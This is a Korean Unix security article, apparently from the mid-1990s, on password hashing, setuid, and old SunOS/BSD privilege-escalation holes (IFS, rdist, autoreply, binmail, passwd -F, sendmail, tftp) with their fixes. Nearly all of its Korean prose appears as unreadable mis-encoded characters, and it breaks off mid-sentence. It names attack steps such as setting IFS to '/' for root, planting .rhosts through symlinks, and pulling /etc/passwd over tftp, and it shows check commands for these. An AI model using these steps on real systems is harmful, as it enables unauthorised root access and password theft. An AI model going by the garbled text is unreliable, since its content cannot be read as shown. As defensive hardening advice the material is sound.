    ³ª¸ÓÁö ºÎºÐÀº ¾Ë¾Æº¸Áö ¸øÇÏ°Ô º¯ÇüµÇ¾î ³ª¿Â °ÍÀ» ¾Ë ¼ö ÀÖ´Ù. À§ÀÇ ¿¹¿¡¼­ ÀÔ·ÂÇÑ ´Ü¾î iakasbellsÀÇ ¸¶Áö¸· µÎ ±ÛÀÚ ls¿Í

    ´ÙÀ½¿¡ º¯ÇüµÈ ´Ü¾î lsDy0cB/5/zho>ÀÇ Ã¹ ls¿Í °°´Ù.
    
    ÀÌ ¸¶Áö¸· µÎ ±ÛÀÚµéÀ» key character(ȤÀº salt)¶ó°í ÇÑ´Ù. ÀÌ·± ¹æ½ÄÀ¸·Î ·Î±×Àγ×ÀÓÀ» ÀÔ·ÂÇÑ ÈÄ Æнº¿öµå¸¦ ÀÔ·ÂÇÏ¸é ¸Ç
    ¸¶ Áö¸·ÀÇ µÎ¹ø° ±ÛÀÚµéÀ» °¡Áö°í ÀÔ·ÂÇÑ Æнº¿öµå¸¦ ¾ÏȣȭÇÏ°Ô µÇ°í ÀÌ ¾ÏȣȭÇÑ ÀڷḦ °¡Áö°í /etc/passwd¿Í ³»¿ëÀ» ºñ±³ÇÏ¿©
    ¿Ç´Ù¸é ·Î±×Àο¡ ¼º°øÇÏ°Ô µÇ´Â °ÍÀÌ´Ù.
    
    º¸Åë Æнº¿öµå´Â 8ÀÚ¸¦ ±âÁØÀ¸·Î Çϱ⠶§¹®¿¡ Æнº¿öµå·Î ÀÔ·ÂÇÑ ±ÛÀÚ¼ö¿Í ¸¶Áö¸· µÎ ±ÛÀÚ°¡ Áß¿äÇÑ Àǹ̸¦ °®°Ô µÈ´Ù. ¾Õ Àý¿¡ ¼­µµ
    ¸»ÇßÁö¸¸ ÃæºÐÈ÷ ÃßÃøÇÒ ¼ö ÀÖ´Â Æнº¿öµå¸¦ »ç¿ëÇÏ¸é °ï¶õÇÏ´Ù. ¶Ç /etc/passwd ÆÄÀϷκÎÅÍ Æнº¿öµå¸¦ ÃßÃøÇØ ÁÖ´Â Åøµé(
    Crack À̶óµçÁö Cops)À» »ç¿ëÇØ ¾Ë¾Æ³¾ ¼öµµ ÀÖ´Ù.
    
    ÀÌ ÅøµéÀº ÀڽŵéÀÇ µ¶Æ¯ÇÑ ¾Ë°í¸®ÁòÀ» »ç¿ëÇϴµ¥, À̸¦ Å×¸é »çÀü¿¡ ³ª¿À´Â ´Ü¾îµéÀ̳ª, ID¸¦ µÚÁý¾î ´ëÀÔÇغ»´ÙµçÁö, Æнº¿ö µå ÆÄÀÏ¿¡¼­
    ¾Ë¾Æ³½ ÀÚ·áµéÀ» ´ëÀÔÇغ»´ÙµçÁö ÇÏ´Â ¹æ¹ýÀÌ´Ù. ¹°·Ð ´ëÀÔÀ» ÇÒ ¶§¿¡´Â crypt() ÇÔ¼ö¸¦ ÀÌ¿ëÇØ encrypt(¾Ïȣȭ)ÇÑ ´ÙÀ½ ÀÌ
    °á°ú¸¦ /etc/passwd ÆÄÀÏ¿¡ ÀÖ´Â µÎ¹ø° fieldÀÎ º¯ÇüµÈ ºÎºÐ°ú °è¼Óºñ±³ÇØ ¸Â´ÂÁö¸¦ È®ÀÎÇس»°Ô µÈ´Ù.
    
    ÀÌ·± ÀÌÀ¯·Î ÀÎÇØ ÈçÈ÷ Àϻ󿡼­ ¾²´Â ´Ü¾îµéÀº Àû¹ßµÉ ¿ì·Á°¡ ³ôÀºµ¥, ÁÁÁö ¾ÊÀº Æнº¿öµå·Î¼­ ´ÙÀ½°ú °°Àº »ç·Ê¸¦ µé ¼ö ÀÖ´Ù .
    
    
    ÁÁÁö¾ÊÀº Æнº¿öµåÀÇ ¿¹

    
    
        ID¿Í °°Àº password
        »ç¿ëÇÏ´Â ½Ã½ºÅÛÀÇ À̸§
        ÄÄÇ»ÅÍ È£½ºÆ®ÀÇ À̸§
        ¿µ¾î»çÀü¿¡ ³ª¿À´Â ´Ü¾î (boss , world .... )
        ÀüÈ­¹øÈ£
        »ýÀÏ
        Å°º¸µåÀ§ÀÇ °°Àº ¼±»ó¿¡ ÀÖ´Â ±Û¼èµéÀÇ ¿¬¼Ó.(qwert,asdf .....)
        µ¿ÀÏÇÑ ±ÛÀÚÀÇ ¿¬¼Ó (11111, eeeee .... )
    setuid¶õ ¹«¾ùÀΰ¡?
    
    /etc/passwdÀÇ ¼ÒÀ¯ÁÖ´Â ºÐ¸íÈ÷ È£½ºÆ® °ü¸®ÀÚ(root)ÀÌ´Ù. ¶ÇÇÑ ¿ì¸®´Â Æнº¿öµå¸¦ ¹Ù²Û ´ÙÀ½ º¯°æµÈ ³»¿ëÀ»
    /etc/passwd ÆÄÀÏ ¿¡ ÀúÀåÀ» ÇÏ°í ÀÖ´Ù. ÀÌ»óÇÏÁö ¾ÊÀº°¡? º¸ÅëÀÇ ¿¹¶ó¸é permission denied ¶ó´Â ´«¿¡ ÀÍÀº
    ¸Þ½ÃÁö°¡ ¶°¾ß ÇÒ ÅÙµ¥ ¸»ÀÌ´Ù. ¿©±â ¿¡ ¾ÆÁÖ Áß¿äÇÑ ³»¿ëÀÌ ´ã°Ü ÀÖ´Ù. ¹Ù·Î setuid¶ó´Â °ÍÀÌ´Ù. ´ÙÀ½À» ¼öÇà½ÃÄÑ º¸ÀÚ.
    
    
        % ls -al /bin/passwd
        rwsr-xr-x 2 root 512 Jan 11 12:31 passwd
        
    ¾Õ¿¡¼­ ¼³¸íÀÌ Àß µÆ°ÚÁö¸¸ setuid bit·Î¼­ s°¡ Ç¥½ÃµÅ ÀÖÀ½À» ¾Ë ¼ö ÀÖ´Ù. ÀÌ´Â ÀÌ ÇÁ·Î±×·¥ÀÌ ½ÇÇàµÇ´Â µ¿¾ÈÀº ·çÆ®ÀÇ ±ÇÇÑÀ»
    °¡Áú ¼ö ÀÖ°Ô µÇ¸ç ÇÁ·Î±×·¥ÀÌ ³¡³²°ú µ¿½Ã¿¡ ÀÌ ±ÇÇÑÀº »ç¶óÁö°Ô µÈ´Ù. ±×·± ÀÌÀ¯·Î Æнº¿öµå¸¦ ÀÌ¿ëÇØ /etc/p

asswd ÆÄÀÏÀ» ¿ì
    ¸®°¡ ¹Ù²Ü ¼ö ÀÖ´Â °ÍÀÌ´Ù.
    
    ¿ì¸®´Â ÀÌ·± setuid¸¦ ¸¹ÀÌ ÀÌ¿ëÇÏ°í ÀÖ´Ù. ·Î±×ÀÎ ÇÁ·ÒÇÁÆ®°¡ ³ª¿ÔÀ» ¶§ ¿ì¸®´Â »ý°¢¾øÀÌ ·Î±×ÀÎÀ» ÇÏÁö¸¸ ³»ºÎ¿¡¼­´Â »ó´çÈ÷ º¹ÀâÇÑ
    ±¸µ¿ÀÌ ÀÌ·ïÁö°í ÀÖ´Ù. ¿ì¼± login À̶ó´Â ¸Þ½ÃÁö ´ÙÀ½¿¡ µé¾î¿À´Â »ç¿ëÀÚÀÇ ID¸¦ ÀÐ¾î µéÀδÙ.
    
    ±×¸®°í Æнº¿öµå¸¦ ÀÐ¾î µéÀ̴µ¥ ÀоîµéÀÎ Æнº¿öµå¸¦ crypt() ÇÔ¼ö¸¦ ÀÌ¿ëÇØ ¾Ïȣȭ½ÃŲ´Ù. ÀÌ ¾ÏȣȭµÈ Æнº¿öµå¸¦ /etc/pas
    sword(Shadowing passwd ÀÎ °æ¿ì´Â ´Ù¸¥ ÆÄÀÏ À̸¦Å׸é passwd.adjunct °°Àº ´Ù¸¥ ÆÄÀÏÀ» ÂüÁ¶ÇÑ´Ù.)ÀÇ µÎ¹ø°
    field¿Í ºñ±³ÇØ °°À¸¸é ¿Ã¹Ù¸¥ Æнº¿öµå¸¦ ÀÔ·ÂÇßÀ¸¹Ç·Î loginÀ» Çã°¡ÇØÁØ´Ù. ´Ù½Ã ls /bin/loginÀ» Çغ¸¸é ¾Ë°ÚÁö¸¸ ÀÌ
    loginµµ root ¼ÒÀ¯ÀÇ se tuid bit°¡ ºÙÀº ÆÄÀÏÀÌ´Ù.
    
    ¿©±â¼­ ¾Ë¾ÆµÖ¾ß ÇÒ Á¡Àº Æнº¿öµå¸¦ È®ÀÎÇÒ ¶§ /etc/passwd ÆÄÀÏÀÇ µÎ ¹ø° field¸¦ Ç®¾î¼­ ÀÔ·ÂµÈ Æнº¿öµå¿Í ¸ÂÃç º¸´Â °Ô
    ¾Æ´Ï¶ó´Â Á¡ÀÌ´Ù. ÀÌ·± decrypt ÇÔ¼ö´Â ¾øÀ¸¸ç ¾Ë°í¸®Áòµµ Á¸ÀçÄ¡ ¾Ê´Â´Ù. ÀÌ·Î ÀÎÇØ ºÒ¿ÏÀüÇÏÁö¸¸ À¯´Ð½ºÀÇ º¸¾ÈÀÌ ÀÌ·ïÁö°í ÀÖ ´Â
    °ÍÀÌ´Ù.
    
    ¶ÇÇÑ ¾Õ¿¡¼­ À̾߱âÇßÁö¸¸ ·çÆ® ¼ÒÀ¯ÀÌ°í setuid°¡ ½ÇÇàµÇ´Â µ¿¾ÈÀº ½Ã½ºÅÛ°ü¸®ÀÚÀÇ ±ÇÇÑÀ» °®´Â´Ù°í Çß´Ù. ¿ì¸®´Â ÀÌ°ÍÀ» º¸°í
    effective uid¶ó°í ÇÑ´Ù. ÇØÄ¿µéÀº ÀÌ·± ·çÆ® ¼ÒÀ¯ÀÇ setuid bit ÆÄÀϵéÀ» ½ÇÇà½ÃÅ°´Â µ¿¾È ÀÎÅÍ·´Æ®¸¦ °É ¼ö

 ÀÖ´Â ½©
    ½ºÅ©¸³ Æ®¶óµç°¡ ÅøÀ» ÀÌ¿ëÇØ ÀÌ ÆÄÀϵéÀÇ ½ÇÇàÀ» ÁßÁö½ÃŲ »óÅ·ΠÀÖ°Ô ÇÑ´Ù. Áï rootÀÇ ±ÇÇÑÀ» °¡Áø ä·Î ÀÖµµ·Ï ÇÏ´Â °ÍÀÌ´Ù. ÀÌ·±
    ½ÄÀ¸·Î ÇØ rootÀÇ ±ÇÇÑÀ» ºÒ¹ýÀûÀ¸·Î ȹµæÇÏ´Â °ÍÀÌ ´ëºÎºÐÀÇ ÇØÅ·¹æ¹ýÀÌ´Ù.
    
    °ú°ÅÀÇ ÇØÅ· À¯Çüµé
    ¿¹Àü¿¡´Â ÁÖ·Î ³×Æ®¿öÅ©»óÀ̳ª ·ÎÄà ȣ½ºÆ®»ó¿¡¼­ config urationÀÌ À߸øµÈ °ÍÀ» ÀÌ¿ëÇØ °ü¸®ÀÚÀÇ ±ÇÇÑÀ» ¾ò´Â Ãʺ¸ÀûÀÎ ÇØÅ·ÀÌ
    ¸¹¾Ò´Ù. Áï, OS¸¦ ÀνºÅçÇϸé ÇÁ·Î±×·¥µéÀÇ Æ۹̼ÇÀÌ ÀûÀý È÷ Á¶Á¤ ¾ÈµÅÀÖ´Â °æ¿ì°¡ ¸¹Àºµ¥, À̸¦ ¾Ç¿ëÇØ È£½ºÆ® °ü¸®ÀÚ¸¸ÀÌ º¸°í ¾µ ¼ö
    ÀÖ´Â ÆÄÀϵµ ¸¶À½´ë·Î Á¶ÀÛÇÏ´Â °æ¿ì°¡ ¿¹ÀüÀÇ ÇØ Å· À¯ÇüÀ̾ú´Ù. ¶ÇÇÑ ¿ôÁö ¸øÇÒ ¾ê±â·Î ÇØÅ·½Ãµµ¸¦ Çصµ °è¼Ó ½ÇÆÐÇÏ°Ô µÇÀÚ, ±â°è¸¦ µé°í
    ÈÉÃÄ ´Þ¾Æ³­ µµµÏÇØÄ¿(?) µµ ÀÖ´Ù.
    
    ±âÃÊ Áö½ÄÀ» ¾Ë¾Ò´Ù¸é ¿¹Àü¿¡ ÀÖ¾ú´ø ÇØÅ·À¯Çü°ú, ¿¹ÀüÀÇ ¹ö±×µéÀ» »ìÆ캸ÀÚ. ¹°·Ð ¾ð·Ð¸ÅüÀÇ ¼º°Ý»ó ÇöÀç °¡Àå ½É°¢ÇÑ È¦(º¸ ¾È±¸¸Û)µéÀº
    ½ÆÁö ¾Ê¾Ò´Ù. ¶ÇÇÑ ºÐ·®»ó ¼ö¸¹Àº ¹ö±×µéÁß ±ØÈ÷ ÀϺκи¸À» ´Ù·ç¾ú´Ù.
    
    
    /usr/local/bin/sysinfo version 1.0.0 ÀÇ ¹ö±×
    
    À¯´Ð½º ½Ã½ºÅÛ¿¡´Â IFS(Internal File Seperator)¶ó´Â ȯ°æ º¯¼ö°¡ ÀÖ´Ù. ÀÌ°ÍÀÌ shell º¯¼ö·Î ¼±¾ðÇÒ ¶§ ¿©·¯
    ¹®Á¦¸¦ ÀÏÀ¸Å°´Â °æ¿ì°¡ ¸¹´Ù. IFS¶ó´Â ȯ°æº¯¼ö¸¦ ³»ºÎ À¯ÀúµéÀÌ ¸¶À½´ë·Î Á¶ÀÛÇØ °ü¸®ÀÚÀÇ ±ÇÇÑÀ» ¾ò¾î³¾ ¼ö Àִµ¥ ÀÌ·¯ÇÑ À¯ÇüÀÇ

    ÇØÅ·À¸·Î ´Â loadmodule ÇØÅ·, expreserve ÇØÅ·, rdist ÇØÅ· µîÀÌ ÀÖ´Ù. ÀÌ´Â ´Ü¼øÈ÷ ½© º¯¼öÁß IFS¸¦ /·Î
    ¼±¾ðÇÏ°í (½©¸¶´Ù ´Ù¸£°ÚÁö¸¸ ¿¹¸¦ µé¾î csh À̶ó¸é % setenv IFS /) ¸î°¡Áö Æ®¸¯À» ÅëÇØ ÀϹÝÀ¯ÀúµéÀÌ ½±°Ô rootÀÇ ±ÇÇÑÀ»
    °¡Áú ¼ö ÀÖ°Ô µÈ´Ù.
    
    ÇØ°áÃ¥ : sysinfo ¹öÀü 2.0.6 À» ±¸Çؼ­ »õ·Î ÀνºÅç ÇÑ´Ù.
    
    
    rdist ¹ö±×
    
    SunOS 4.1.2¿Í ±× ÀÌÀüÀÇ OS, A/UX 2.0.1, SCO 3.2v4.2, BSD NET/2 °è¿­ Systems ¶Ç´Â BSD
    rdist¸¦ Áö¿øÇÏ´Â ´ëºÎºÐÀÇ ½Ã½ºÅÛ¿¡ ¼­ /usr/ucb/rdist³ª /usr/bin/rdist´Â º¸¾È¿¡ ¹®Á¦°¡ µÇ´Â ¹ö±×¸¦ °¡Áö°í
    ÀÖ´Ù.
    
    rdist´Â popen(3) À̶ó´Â ³»ºÎ ½Ã½ºÅÛ ÇÔ¼ö(C function)À» ÀÌ¿ëÇØ ÇØÅ·À» ÇÏ°Ô µÈ´Ù. À̶§ ÇØÅ·À» À§ÇØ ÀÌ¿ëÇÏ´Â
    sendmail À̶õ ÇÁ·Î±×·¥Àº root ÀÇ ±ÇÇÑÀ» °®°í ½ÇÇàÀÌ µÇ°Ô µÈ´Ù. ÀÌ ¿ª½Ã setuid ¶§¹®Àε¥ À̸¦ ¾Ç¿ëÇÏ¿© ¾î¶² À¯Àú¶óµµ
    root °¡ µÉ ¼ö ÀÖ´Ù .
    
    ÇØ°áÃ¥ : SunOsÀÇ Patch-ID# 100383-06 ÀÇ ÆÐÄ¡¸¦ °¡Á®¿Í¼­ ¼³Ä¡Çϸé ÇØ°áÀÌ µÈ´Ù. ¶Ç´Â rdistÀÇ ±â´ÉÀ» ¾ø¾Ö±â
    À§ÇØ setuid bi t¸¦ Á¦°ÅÇϰųª Æ۹̼ÇÀ» 0À¸·Î Çعö¸°´Ù.
    
    


    autoreply ¹ö±×
    
    /usr/local/bin/autoreply´Â elm ÆÐÅ°ÁöÀÇ ¼³Ä¡¿¡¼­ ºÎ¼öÀûÀ¸·Î µû¶ó³ª¿À´Â ÇÁ·Î±×·¥ÀÌ´Ù. elmÀÇ ¹ö±×´Â ¸ðµç OS¿¡¼­
    °øÅëÀûÀ¸ ·Î ÁöÀûµÇ´Â ¹®Á¦Á¡ÀÌ´Ù. µû¶ó¼­ ÀÌ ¹ö±×´Â ´ë´Ù¼öÀÇ ÇØÄ¿µé¿¡°Ô ´ë´ÜÇÑ »ç¶û(?)À» ¹Þ¾Ò´ø ¹ö±×ÀÌ´Ù. ÀÌ ¹ö±×´Â ¶ÇÇÑ OS¿¡ °ü°è
    ¾øÀÌ Elm Mail SystemÀ» ¾²±â¸¸ ÇÏ¸é º¸¾ÈÀÇ ÇêÁ¡À» °¡Áö°Ô µÈ´Ù´Â µ¥¿¡¼­ ÁÖ¸ñÇÒ ¸¸ÇÏ´Ù. ¿ª½Ã setuidÀÇ ¼öÇàÁß ÀÎÅÍ·´Æ®¸¦
    °É ¾î rootÀÇ ±ÇÇÑÀ¸·Î ÇÁ·Î±×·¥ÀÌ ÀÛµ¿ÇÏ´Â »óÅ¿¡¼­ ÀÚ½ÅÀÌ ¿øÇÏ´Â ÀÛ¾÷À» ¼öÇàÇϵµ·Ï Á¶ÀÛÇÑ´Ù. À̸¦ ÀÌ¿ëÇØ ¿øÇÏ´Â °÷¿¡ ÀÓÀÇÀÇ ÆÄÀÏÀ»
    ±â·ÏÇÒ ¼ö ÀÖ´Ù. À̸¦ ÀÌ¿ëÇØ root µð·ºÅ丮¿¡ .rhosts¿¡ Á¶ÀÛÀ» ÇÏ´Â °æ¿ì°¡ ´ëºÎºÐÀÌ´Ù.
    
    ÇØ°áÃ¥ : ÇöÀç·Î¼­ÀÇ °¡Àå ÁÁÀº ÇØ°áÃ¥Àº ¾Æ¿¹ autoreplyÀÇ Æ۹̼ÇÀ» 0À¸·Î ÁÖ¾î »ç¿ëÀ» ¸øÇÏ°Ô Çعö¸®´Â °ÍÀÌ´Ù. ÇÏÁö¸¸ ÆÛ¹Ì ¼ÇÀ»
    666À¸·Î µÎ´Â °Íµµ ¾ÈÀüÇÏ´Ù.
    
    
    binmail(/usr/bin/mail)ÀÇ ¹ö±×
    
    ÀÌ´Â ½ã OS 4.1.xÀÇ ¹öÀü¿¡¼­ Àû¿ëµÇ´Â ¹ö±×ÀÌ´Ù. ÀÌ´Â ÆÄÀÏ ½Ã½ºÅÛÀÇ ¾î´À °÷¿¡¶óµµ ÀÓÀÇÀÇ ÆÄÀÏÀ» »ý¼º½Ãų ¼ö À־ ÀÏ¹Ý À¯ÀúµéÀÌ
    root°¡ µÉ ¼ö ÀÖ´Ù. ÀÌ ¹ö±×´Â /var/spool/mailÀÇ µð·ºÅ丮 Æ۹̼ÇÀÌ rwxrwxrwt(ȤÀº rwxrwxr-x)·Î ¸ðµç
    À¯Àú¿¡°Ô ¾²±â ±ÇÇÑÀÌ Çã°¡µÅÀֱ⠶§¹®¿¡ ¾ß±âµÆ´ø ¹ö±×ÀÌ´Ù.
    

    ÇØ°áÃ¥ : 1. vendor µé¿¡°Ô¼­ patch ¸¦ ±¸ÇÑ´Ù.
    2. °¡Àå ÀÌ»óÀûÀ¸·Î ÇØ°áÀ» ÇÏ´Â °ÍÀº mail spool µð·ºÅ丮ÀÇ ¾²±â ±ÇÇÑÀ» ¾Æ¿¹ ¾ø¾Ö¹ö¸®´Â °ÍÀ̳ª, ÀÌ ¾²±â ±ÇÇÑÀÌ ¾ø´Ù¸é
    elmÀ̳ª /bin/mail, /usr/ucb/Mail À» »ç¿ëÇÒ ¼ö ¾ø°Ô µÈ´Ù.
    
    
    passwd(/usr/bin/passwd)ÀÇ ¹ö±×
    
    /bin/passwd -FÀÇ ¹ö±×¶ó°íµµ ÇÏ´Â ÀÌ°ÍÀº SunOS 4.1.xÀÇ ±âÁ¾¿¡¼­ ÇØ´çµÇ´Â ¹ö±×ÀÌ´Ù. ¾î¶°ÇÑ ÀÏ¹Ý À¯Àú¶óµµ À§ÀÇ ¹ö±×¸¦
    ÀÌ ¿ëÇØ, ÀÓÀÇÀÇ ÆÄÀÏ(¹°·Ð °ø°ÝÀ» ¸ñÀûÀ¸·Î ÇϹǷΠ/ µð·ºÅ丮ÀÇ .rhosts¸¦ »ý¼º½ÃÅ°´Â °ÍÀÌ´Ù.)À» »ý¼ºÇØ ÀÌ´Â ÆÄÀÏÀÌ »ý¼ºµÇ±â¸¦
    ¿øÇÏ´Â µð·ºÅ丮¿¡ symbolic link¸¦ °É¾î³õ°í ÀÚ½ÅÀÌ ¸¸µé°í ½ÍÀº ÆÄÀÏÀ» ÀÌ °÷À¸·Î ¸µÅ©½ÃÄѹö¸®´Â ¹æ¹ýÀ» ÀÌ¿ëÇÏ´Â °ÍÀÌ´Ù.
    
    ÇØ°áÃ¥: 1. º¥´õµé¿¡°Ô¼­ ÆÐÄ¡(¹ö±× ¼öÁ¤ ÇÁ·Î±×·¥)¸¦ ±¸Çϵµ·Ï ÇÑ´Ù.
    2. passwdÀÇ ½ÇÇàÆÄÀÏ¿¡¼­ -F ¿É¼ÇÀ» »èÁ¦ÇØ °£´ÜÈ÷ ÆÐÄ¡ÇÒ ¼ö ÀÖ´Ù.
    
    
    SunOS 4.X.X /usr/lib/sendmailÀÇ ¹ö±×
    
    ÈçÈ÷ SMTP(Simple Mail Transfer Protocol)ÀÇ ¹ö±×¶ó°í ºÒ¸®±âµµ ÇÏ´Â °ÍÀÌ´Ù.ÀüÀÚ¿ìÆí ½Ã½ºÅÛÀº ¿ÜºÎ¸Á°úÀÇ ¿¬°á¿¡
    ÇʼöÀûÀÎ À¯Æ¿¸®Æ¼·Î¼­ BSD À¯´Ð½º¿¡´Â ¿ìÆíÀÇ ¹è´Þ°ú ¼ö½ÅÀ» ´ã´çÇÏ´Â sendmail ÇÁ·Î±×·¥ÀÌ Àִµ¥ ÀÌ ÇÁ·Î±×·¥ÀÇ ±¸ ¹öÀü¿¡´Âº¸¾È»óÀÇ

    ¹®Á¦¸¦ °¡Áö°í ÀÖ´Ù. ÀÌ°ÍÀº ÀÚ½ÅÀÇ È£½ºÆ®ÀÇ 25¹ø Æ÷Æ®¸¦ ¿­¾î º¸¾Æ ¹ö±×°¡ ÀÖ´ÂÁö È®ÀÎÀ» ÇØ º¸¾Æ¾ß ÇÑ´Ù. ÇöÀç BSD 8.6.4 ¹ö
    ÀüÀº ÀÌ ¹®Á¦Á¡ÀÌ ÀÖ´Â °ÍÀ¸·Î µå·¯³µ´Ù. ÀÌ¹Ì Worm ¿¡¼­ ½É°¢ÇÑ º¸¾È¹®Á¦¸¦ ÀÏÀ¸Å² ¹Ù ÀÖÀ¸¹Ç·Î ÃÖ½ÅÀÇ ¹öÀüÀ¸·Î ¹Ù²Ù¾î Áֱ⠹ٶõ´Ù.
    
    ÇØ°áÃ¥ : sendmail ÇÑ±Û ¹öÀüÀ» ÀνºÅçÇÏ¸é µÈ´Ù. sendmail ÇÑ±Û ¹öÀüÀº
    ftp://cair-archive.kaist.ac.kr/pub/hangul/mail ¿¡¼­ ±¸ÇÒ ¼ö ÀÖ´Ù.
    
    1) telnet <È£½ºÆ® À̸§> 25¸¦ Çؼ­ ÀÚ½ÅÀÇ È£½ºÆ®¿¡ ¼³Ä¡µÈ sendmail ÀÇ ¹öÀü
    À» È®ÀÎÇÑ´Ù.
    
    2) /etc/aliases³ª /usr/ucb/aliases¿¡¼­ 'decode'¸¦ Á¦°ÅÇÑ´Ù.
    
    
        % cat /etc/aliases
        decode: "|/usr/bin/uudecode"
        
    À§¿Í °°ÀÌ µÇ¾î ÀÖÀ» ¶§´Â À§ ¹®ÀåÀ» ÁÖ¼® ó¸®ÇØÁØ´Ù.
    
    ¿Ã¹Ù¸¥ ¿¹
    
    
        # cat /etc/aliases
        ...
        #decode: "|/usr/bin/uudecode"
        
    3) ÇÁ·Î±×·¥¿¡ ¸Þ½ÃÁö¸¦ º¸³»´Â °æ¿ì ½© ¸í·ÉÀ» º¸³»´Â ¹æ¹ýÀ» »ç¿ëÇÏÁö

¾Êµµ·Ï
    ÇÑ´Ù.
    
    4) sendmail.cf ¿¡¼­ 'wizard' Æнº¿öµå¸¦ »ç¿ëÇÏÁö ¾Ê´Â´Ù.
    
    5) sendmail ¿¡¼­ 'debug' ¸í·ÉÀ» ÀÌ¿ëÇÏÁö ¾Ê´Â´Ù,
    
    ´ÙÀ½À» ÂüÁ¶Çϵµ·Ï ÇÑ´Ù.
    
    
        baikdu % telnet localhost 25
        Connected to localhost.
        Escape character is '^]'.
        220-baikdu.kaist.ac.kr Sendmail 8.6.9H1/Baikdu_KAIST_CSH ready at Thu,
        16 Mar 1995
        00:58:23 +0900
        220 ESMTP spoken here
        debug
        500 Command unrecognized
        wiz
        500 Command unrecognized
        kill
        500 Command unrecognized
        quit
        221 baikdu.kaist.ac.kr closing connection
        Connection closed by foreign host.
        

        
    ¸¸ÀÏ 'debug'¿¡ '200 Debug set'À¸·Î ÀÀ´äÇÑ´Ù¸é »õ ¹öÀüÀ¸·Î ±³Ã¼Çϱ⠹ٶõ´Ù.
    
    
    tftp ¹ö±×
    
    tftp(Trivial ftp)´Â µð½ºÅ© ¾ø´Â ¿öÅ©½ºÅ×À̼ǵéÀÇ ³×Æ®¿öÅ© ºÎÆ®±â´ÉÀ¸·Î À¯Àúµ¥ÀÌÅͱ׷¥ ¹æ½ÄÀÇ Á¢¼Ó¾ø´Â ÇÁ·ÎÅäÄÝÀ» ÀÌ¿ëÇÑ ´Ù.
    ÀÌ´Â ´Ü¼øÇÑ ÇÁ·ÎÅäÄÝÀ̹ǷΠº¸¾È»óÀÇ ÇêÁ¡À» °¡Áö°í ÀÖ´Ù. tftp ¼³Ä¡¸¦ À߸øÇسõ¾ÒÀ» °æ¿ì ¿ÜºÎÀÇ ÇØÄ¿°¡ tftp¸¦ ÀÌ¿ëÇØ /e
    tc/passwd ÆÄÀÏÀ» °¡Á®°¥ ¼ö°¡ ÀÖ´Ù. ÀÚ½ÅÀÇ È£½ºÆ®¿¡ ¼³Ä¡µÈ tftp°¡ ¾ÈÀüÇÑÁö¸¦ get /etc/passwd¸¦ ÀÌ¿ëÇØ È®ÀÎÇغ¸±â
    ¹Ù¶õ´Ù.
    
    
        [baram-sakai 193 ] tftp baram.kaist.ac.kr
        tftp> status
        Connected to baram.kaist.ac.kr.
        Mode: netascii Verbose: off Tracing: off
        Rexmt-interval: 5 seconds, Max-timeout: 25 seconds
        tftp> get /etc/passwd
        Error code 1: File not found
        tftp>
        
        
    À§¿Í °°ÀÌ ¿¡·¯¸Þ½ÃÁö°¡ ¶ßÁö ¾Ê´Â´Ù¸é ¼³Ä¡°¡ À߸øµÈ °ÍÀÌ´Ï ¼öÁ¤Çϱ⠹ٶõ´Ù

. ¸¸ÀÏ ¾²Áö ¾Ê´Â´Ù¸é ¾Æ¿¹ Æ۹̼ÇÀ» 0À¸·Î µÎ¾î ÀÛµ¿À» ¸øÇÏ°Ô
    Çϵ簡 /etc/inetd.conf ¸¦ ´ÙÀ½°ú °°ÀÌ µÐ´Ù.
    
    
        tftp dgram udp wait nobody /usr/etc/in.tftpd in.tftpd -s /tftpboot
        
    TCP_WRAPPER¸¦ »ç¿ëÇÏ´Â °Íµµ ¸¹Àº µµ¿òÀÌ µÈ´Ù.
    
    º¸¾È°ü·Ã FAQ
    ÇØÄ¿°¡ ħÀÔÇϱ⠰¡Àå ÁÁÀº ½Ã±â¿Í ȯ°æÀº?
    
    Àü»ê¸ÁÀ» ±¸¼ºÇÏ´Â ³×Æ®¿öÅ©ÀÇ ³¡¿¡´Â ³×Æ®¿öÅ©¸¦ ±¸¼ºÇϱâ À§ÇÑ ÄÄÇ»Å͵é(È£½ºÆ®)µéÀÌ ºÙ¾î ÀÖ¾î¾ß ÇÏ°í ÀÌ È£½ºÆ®µéÀº ¿î¿µÃ¼ Á¦¸¦ µ¹¸®°Ô
    ¸¶·ÃÀÌ´Ù. ÇÏÁö¸¸ OS ´Â Àΰ£ÀÌ Â§ ÇÁ·Î±×·¥ÀÎ ÀÌ»ó ¹ö±×°¡ ÀÖ°Ô ¸¶·ÃÀÌ°í ÀÌ ¹ö±×·Î ¸»¹Ì¾Ï¾Æ º¸¾È»óÀÇ ¹®Á¦°¡ À¯ ¹ßµÇ´Â °ÍÀÌ´Ù. À¯´Ð½º
    ½Ã½ºÅÛ°ú °°ÀÌ ¸ÖƼÀ¯ÀúµéÀÌ »ç¿ëÇÏ´Â ½Ã½ºÅÛÀº º¸¾È»ó ¿Ïº®ÇØÁú ¼ö ¾ø´Ù´Â °ÍÀÌ ¼öÇÐÀûÀ¸·Î Áõ¸íÀÌ µÆ´Ù .
    
    ´õ±º´Ù³ª ÀÌ È£½ºÆ®¸¦ ³×Æ®¿öÅ©»ó¿¡ ¿¬°áÇسõ°Ô µÇ¸é ´õ ¹®Á¦°¡ ÀϾ°Ô µÇ´Âµ¥,È£½ºÆ® ³»ºÎÀÇ ¹ö±×¸¦ ÆÐÄ¡ÇÏÁö ¾ÊÀºÃ¤ ³×Æ®¿ö Å©»ó¿¡ ¿Ã·Á
    ³õ°Ô µÇ¸é '¹äÀ» Â÷·Á ³õ¾ÒÀ¸´Ï ¹äÀ» ¸Ôµµ·Ï ÇϽÿÀ'¶ó°í ÇØÄ¿µé¿¡°Ô ³»ÁÖ´Â ¼ÀÀÌ µÈ´Ù. ±×·¡¼­ °¡Àå ¿Ïº®ÇÏ°Ô º¸¾È À» À¯ÁöÇÏ°í ½ÍÀ¸¸é
    ³×Æ®¿öÅ©¿¡ ¿Ã·Á³õ±â Àü¿¡ ³»ºÎ Ȧ(hole)À» ¿ÏÀüÈ÷ ÆÐÄ¡¸¦ ÇÏ°í, ±× ´ÙÀ½¿¡ ³×Æ®¿öÅ©¿¡ ¿¬°áÇسõ´Â °ÍÀÌ ÁÁ ´Ù.
    
    OS¸¦ °« ÀνºÅçÇÏ°í³­ Á÷ÈÄ¿¡´Â OSÀÇ ¹ö±×µéÀÌ ¾ÆÁ÷ ³²¾Æ

 ÀÖ´Â »óÅ¿©¼­ ÀÌ ¶§ ÇØÄ¿µé¿¡°Ô ħÀÔÀ» ¹Þ°Ô µÇ¸é ¼Ó¼ö¹«Ã¥ÀÌ µÈ´Ù. ¶ÇÇÑ
